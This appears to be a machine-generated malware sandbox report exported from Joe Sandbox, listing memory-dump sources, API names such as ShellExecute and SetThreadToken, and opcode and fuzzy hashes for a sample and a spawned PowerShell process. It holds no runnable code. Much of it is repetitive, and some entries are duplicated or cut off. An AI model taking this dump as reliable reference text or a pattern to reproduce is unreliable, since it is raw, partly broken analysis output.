                                                                                                                    • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID: ! @$%s\%s$& @$1 @$D`4wD`4w$`!@$h!@$o!@
                                                                                                                    • API String ID: 3236948872-1506132525
                                                                                                                    • Opcode ID: fb0314bb89e4bd09486ac8e0109c434c0390084252135cbf240de6d7b9b86a64
                                                                                                                    • Instruction ID: ddd33b2b7367e72d4b2ea49baa425b383fc80029fe05322618666ae03f79651f
                                                                                                                    • Opcode Fuzzy Hash: fb0314bb89e4bd09486ac8e0109c434c0390084252135cbf240de6d7b9b86a64
                                                                                                                    • Instruction Fuzzy Hash: A0811FF1E001149BDB14DBACDC55B9E77A9EB48309F04057AF109FB392E63DAE448B68

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 98952953-0
                                                                                                                    • Opcode ID: 396f06f7f0b3d99925f8e6365d685a568df60c8fc8c39a5659122d7209982daa
                                                                                                                    • Instruction ID: 0752c36ba91bfafbf4fad5d93ced69d27afe32613dba049bda7c2a5235eee97d
                                                                                                                    • Opcode Fuzzy Hash: 396f06f7f0b3d99925f8e6365d685a568df60c8fc8c39a5659122d7209982daa
                                                                                                                    • Instruction Fuzzy Hash: 244147F0E105149BDB18D758DC51B9973A9EB84309F0405BDF106FB392D53CB989CB28

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 49 401000-40102e malloc 50 401031-401039 49->50 51 401087-40108b 50->51 52 40103f-401085 50->52 52->50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • +zr]j2!:c>*9-2g&b=g*<bt,//hrv<b<, xrefs: 0040106E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID: +zr]j2!:c>*9-2g&b=g*<bt,//hrv<b<
                                                                                                                    • API String ID: 2803490479-881568434
                                                                                                                    • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                                                                                    • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                                                                                                                    • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                                                                                                                    • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 55 40145b-4014ae call 4013b4 call 40108c call 401410
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ExecuteShellstrcmp
                                                                                                                    • String ID: D`4wD`4w$D`4wD`4w
                                                                                                                    • API String ID: 1389483452-3394693991
                                                                                                                    • Opcode ID: 9533a952e54bd6f8001f668a3f0dfa94ddbeed1e55bb20da68c2a9291ac6979b
                                                                                                                    • Instruction ID: 55a6438b5c1c20d3bee696981992d7166572ef050206657248e041b7fb238655
                                                                                                                    • Opcode Fuzzy Hash: 9533a952e54bd6f8001f668a3f0dfa94ddbeed1e55bb20da68c2a9291ac6979b
                                                                                                                    • Instruction Fuzzy Hash: C0F0F8B9A00208EFCB40EFA8D881E8A77F8AB4C308F014075F908D7354E634EA458B58

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:6.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 22475 8ee6828 22476 8ee686b SetThreadToken 22475->22476 22477 8ee6899 22476->22477

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 829 361b550-361b589 831 361b58b 829->831 832 361b58e-361b8c9 call 361ad9c 829->832 831->832 893 361b8ce-361b8d5 832->893
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4653d39f55998c27e8c17cb7bf70ae65fe21ed1dcdca4510ee983f98b828567c
                                                                                                                    • Instruction ID: 114e4e4f35f446f9e3555affa46924e65fd85090830be53b3d762a22fc9d1b30
                                                                                                                    • Opcode Fuzzy Hash: 4653d39f55998c27e8c17cb7bf70ae65fe21ed1dcdca4510ee983f98b828567c
                                                                                                                    • Instruction Fuzzy Hash: B4919975B00B089FDB19EFB98410AAEBBF2FF84700B00896DE156AB350DF745A058BD5

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
APIs
• SetThreadToken.KERNELBASE(EFC00899), ref: 08EE688A
Memory Dump Source
• Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0

Control-flow Graph
APIs
• SetThreadToken.KERNELBASE(EFC00899), ref: 08EE688A
Memory Dump Source
• Source File: 00000002.00000002.1325661745.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8ee0000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
Memory Dump Source
• Source File: 00000002.00000002.1321281235.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.1321281235.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.1321281235.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000002.00000002.1321281235.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7d70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 72079d6be2d2e5f40b50136138959f92755d05fc52a2bd8828e6e1fb77c85b91
                                                                                                                    • Instruction ID: a2d1cd36cea04831e267d51b193de936e1ad55a2f08654b08bd9554f24108fc3
                                                                                                                    • Opcode Fuzzy Hash: 72079d6be2d2e5f40b50136138959f92755d05fc52a2bd8828e6e1fb77c85b91
                                                                                                                    • Instruction Fuzzy Hash: 6B414C74A006058FCB09CF58C5A8AAEF7B1FF48314B198599D915AB365C736FCA1CFA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd9afa7a2ee7c6780609a9e1f758e0d0c146dd8bb2bca4e3011a1f0461d51ad0
                                                                                                                    • Instruction ID: 63b4e06547832c893393bd671c8e7506b9bb7f182e908ff58296d006d260f7c1
                                                                                                                    • Opcode Fuzzy Hash: cd9afa7a2ee7c6780609a9e1f758e0d0c146dd8bb2bca4e3011a1f0461d51ad0
                                                                                                                    • Instruction Fuzzy Hash: D1319C353006029FD705EB78E844B9EB7A6FFC9211F448539D54ACB361DFB1A845CBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 29abc666e2e69099a6a4f6b399c051a2e33c26e725cef89d1687dc529e2773b3
                                                                                                                    • Instruction ID: 69cbf3fc4d1138eb4aeb196e102429b54f44e96d0ed7e2d2dd31e732d078ed51
                                                                                                                    • Opcode Fuzzy Hash: 29abc666e2e69099a6a4f6b399c051a2e33c26e725cef89d1687dc529e2773b3
                                                                                                                    • Instruction Fuzzy Hash: 05314B34B002058FDB54EF68E458AAEBBF2FF89215F18446DD806EB3A1CB719C55DB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9906415f99e4e54bd3b148fdf7567b882a801cd4f9ed5baff4b692dadcc0922a
                                                                                                                    • Instruction ID: db3a57b20b603c8b5685ecd06c25be95802aa3113b0cecbb9faa3e24c14ec6f4
                                                                                                                    • Opcode Fuzzy Hash: 9906415f99e4e54bd3b148fdf7567b882a801cd4f9ed5baff4b692dadcc0922a
                                                                                                                    • Instruction Fuzzy Hash: 37311A34A00204CFDB14DB65C559AADBBF6EF8D315F1C4098E846AB3A1DB31DC51CB60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a494f847654be3d9ebcb25cac7b771251f88e9fe8f9d26bb79c28259e77de3fe
                                                                                                                    • Instruction ID: 45fcfa905abf33797a367dd5fc74d3440eb728f8e2343dbc3f458fd08c1773b8
                                                                                                                    • Opcode Fuzzy Hash: a494f847654be3d9ebcb25cac7b771251f88e9fe8f9d26bb79c28259e77de3fe
                                                                                                                    • Instruction Fuzzy Hash: A9316974A0520A9FDB04EFA9D594BAEBBF6AF88301F18806DE415EB350EB748C418B54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f1b7ffb582cca18d9b03200018e64241953bf1b7e00d06c5c1daa2b29a3d2b0f
                                                                                                                    • Instruction ID: 5f3f31f9df77739a3f9754abde1c69b1a62673eaa81f47fabb055f6e96960616
                                                                                                                    • Opcode Fuzzy Hash: f1b7ffb582cca18d9b03200018e64241953bf1b7e00d06c5c1daa2b29a3d2b0f
                                                                                                                    • Instruction Fuzzy Hash: 91315E74B0160A9FDB04EFA9D594BAEBBF6EF88301F188069E415EB350EB748C418B54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e41f414fb12004ce3023286614dd83f919305bcc53e161b1c234045293b5b9dc
                                                                                                                    • Instruction ID: d6c62fbc84be3ed04f2389daf069c468d0cb5120b3fc6a565d2f4412bad9fa20
                                                                                                                    • Opcode Fuzzy Hash: e41f414fb12004ce3023286614dd83f919305bcc53e161b1c234045293b5b9dc
                                                                                                                    • Instruction Fuzzy Hash: 0D21B075A043588FCB14DFAED40079EBBF6EF89220F18846ED418E7340DB75A945CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 13492922bc20a5105fd1277193635131eff94d242d252d98487ecefe35374a69
                                                                                                                    • Instruction ID: a6c8b30274eaaccaab6f67d6cf155e6daf7cce2461147befafd22b3f011507c6
                                                                                                                    • Opcode Fuzzy Hash: 13492922bc20a5105fd1277193635131eff94d242d252d98487ecefe35374a69
                                                                                                                    • Instruction Fuzzy Hash: E1318FB8A002099FDB05DBA8D458BAE7BB2FFC5300F14847CD115AF3A5CA759D418F50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e1eae9c2d9080035b296b65c6dfee927a1600d2b940a3ece73709a3f837e18d3
                                                                                                                    • Instruction ID: df7ed92f4939489f3e344035a1d8e7f0f41cc63e9aabbca70b6165ab9afafae7
                                                                                                                    • Opcode Fuzzy Hash: e1eae9c2d9080035b296b65c6dfee927a1600d2b940a3ece73709a3f837e18d3
                                                                                                                    • Instruction Fuzzy Hash: C3314934A002058FDB54EF69D458A9EBBF2FF89214F188469D406EB3A0DF71AC45DB90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1c9711b095df19c17cc561c05295dd13fd4801e5665034d4aa6e5313bd9b2fad
                                                                                                                    • Instruction ID: 218ef9aa926cfad18dd0dcf821cc4dbed4849dc314686a289ba20914f6733743
                                                                                                                    • Opcode Fuzzy Hash: 1c9711b095df19c17cc561c05295dd13fd4801e5665034d4aa6e5313bd9b2fad
                                                                                                                    • Instruction Fuzzy Hash: 6E312FB8A006099FDB04EFA8D458AAE7BB2FFC5300F108479D215AB3A5DB759D419F90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5facec87181c9b64d88e1938ed42e51fc05152bd776a493ac7b657ffb99d7ddb
                                                                                                                    • Instruction ID: 3917485eb852322b6b45c65b0e4595205a810bdc303630a835cfe6a7ad82c5af
                                                                                                                    • Opcode Fuzzy Hash: 5facec87181c9b64d88e1938ed42e51fc05152bd776a493ac7b657ffb99d7ddb
                                                                                                                    • Instruction Fuzzy Hash: 7521F776508700EFDB05DF14E9C0B1ABB65FB88314F24C5ADE9090F266C336D456DBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7a744c8ae6a4e8421df19e2dca5056d50d6e2f3ba67e090c82c347a2be48b3c6
                                                                                                                    • Instruction ID: bb98229d41b226f897448e1280baeb689c8d91793b8078e5c04761e3d68c731a
                                                                                                                    • Opcode Fuzzy Hash: 7a744c8ae6a4e8421df19e2dca5056d50d6e2f3ba67e090c82c347a2be48b3c6
                                                                                                                    • Instruction Fuzzy Hash: 4331ABB0A053448FDB60CF6AD08838AFFF2EB88320F2C845DC84DAB219C7759455CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1930b05e5455600fb3ce97170c9b49f88149a123b28e889cecb85620ae290ee8
                                                                                                                    • Instruction ID: 790d4ee92bff4d8b739cdc99c97ef363c29afdee7b4215785bd888c5e53a268b
                                                                                                                    • Opcode Fuzzy Hash: 1930b05e5455600fb3ce97170c9b49f88149a123b28e889cecb85620ae290ee8
                                                                                                                    • Instruction Fuzzy Hash: CF213775504640DFDB14DF28EDC0B1ABBA5FB84314F28C9ADD90A4B266C336D446EA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6cb7d33ab4e86c48607678ed648132bd93ace76643fb7e12b7fc9cda885473f2
                                                                                                                    • Instruction ID: bc104ff66a1543ba0bd73b103d3659d0a8e1841be3cdf29007438c4b5ce1f9a7
                                                                                                                    • Opcode Fuzzy Hash: 6cb7d33ab4e86c48607678ed648132bd93ace76643fb7e12b7fc9cda885473f2
                                                                                                                    • Instruction Fuzzy Hash: B22159B59057448ADB60DF6AD08838AFBF6EB89310F28C01DD85DA7319C7746491CBA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7fb12543d5aa089ce50f7adf85e4ff17c35ef7229ddc8c270fe4e3b55949cf31
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 452478379183a405cf02f8ae51d4ca82ccc5ef0a22ac4538c87d5d0e2d8b09ac
                                                                                                                    • Instruction ID: aac314778ec08b8a4f216790967f6ea03d7b432efdc73b0ac120916fdfc113d4
                                                                                                                    • Opcode Fuzzy Hash: 452478379183a405cf02f8ae51d4ca82ccc5ef0a22ac4538c87d5d0e2d8b09ac
                                                                                                                    • Instruction Fuzzy Hash: 84F05E343052808FC7119B2DD494876BBF69FCA61932E00DDE4C9CB732CAA1CC11CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 791ab1adcb01993c1079c9093c45a046e8c60bb56a68bbc650d3664b679f78fe
                                                                                                                    • Instruction ID: 1c40d3e786ee27f3c67011c9a6dc94c8937706bdf577b646ad0d7ecd6e0b66ef
                                                                                                                    • Opcode Fuzzy Hash: 791ab1adcb01993c1079c9093c45a046e8c60bb56a68bbc650d3664b679f78fe
                                                                                                                    • Instruction Fuzzy Hash: B9F0A7353007149FC710DB59D844A6F77E9FBC96A1B00062DE50ED7310DF71AD4587A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 075fb406fd28cb016dc1a42421cd25c8c9c73918b47ee334c2575d6cd3a07eb9
                                                                                                                    • Instruction ID: 382c47072ae78bf2f56f5e5a4aca713ec2cac06dc379a47e0957c3890ca07a30
                                                                                                                    • Opcode Fuzzy Hash: 075fb406fd28cb016dc1a42421cd25c8c9c73918b47ee334c2575d6cd3a07eb9
                                                                                                                    • Instruction Fuzzy Hash: 58F0FF75104A40AFD755DF06CD85D23BBB9EBC5634B198489A8594B752C631FC41CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e22447b73902dccbee16d432a4029b4bf55ce7b74352c9cfed4da4c4e62917a
                                                                                                                    • Instruction ID: d40f72fb5488052359aeec4b0ef6660ce7b463d47dee531ff9f9e6e9c3a1f6ec
                                                                                                                    • Opcode Fuzzy Hash: 8e22447b73902dccbee16d432a4029b4bf55ce7b74352c9cfed4da4c4e62917a
                                                                                                                    • Instruction Fuzzy Hash: 43F082352007055BC314EB29E84095FB7E6FFC26157448A3DD1498F720DF71AC059BA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11de350fd3ca61f26785389e11f4573fb4e6999cc158bea8d1ed53c50f1942f1
                                                                                                                    • Instruction ID: 9d4fdb63af4da867b3a95475da31cc96c8ce65e319fa710cd28c5da6c6bf4a70
                                                                                                                    • Opcode Fuzzy Hash: 11de350fd3ca61f26785389e11f4573fb4e6999cc158bea8d1ed53c50f1942f1
                                                                                                                    • Instruction Fuzzy Hash: 7CF0BE7060A3408FD761DBB8D4AC39ABFA1EB42310F0408AEE44ECB282CB396885C750
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 837bbb8a9bddc46c5d25e3c16785348c3b3ef6f3cce1ce2e55d033dc1a778feb
                                                                                                                    • Instruction ID: 18f6c097ef2f8724617b20c196404e8cd11f9c20890cf8c86c9c9315d534ad34
                                                                                                                    • Opcode Fuzzy Hash: 837bbb8a9bddc46c5d25e3c16785348c3b3ef6f3cce1ce2e55d033dc1a778feb
                                                                                                                    • Instruction Fuzzy Hash: ADF0E2796046144BD304BB68D0583AFBBA6EBC0719F10812AC90A4B384CE39680287E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 51c0b5aabacade3e3f8f8534120455697c3b9bdda41f363032bd47c0c64428b0
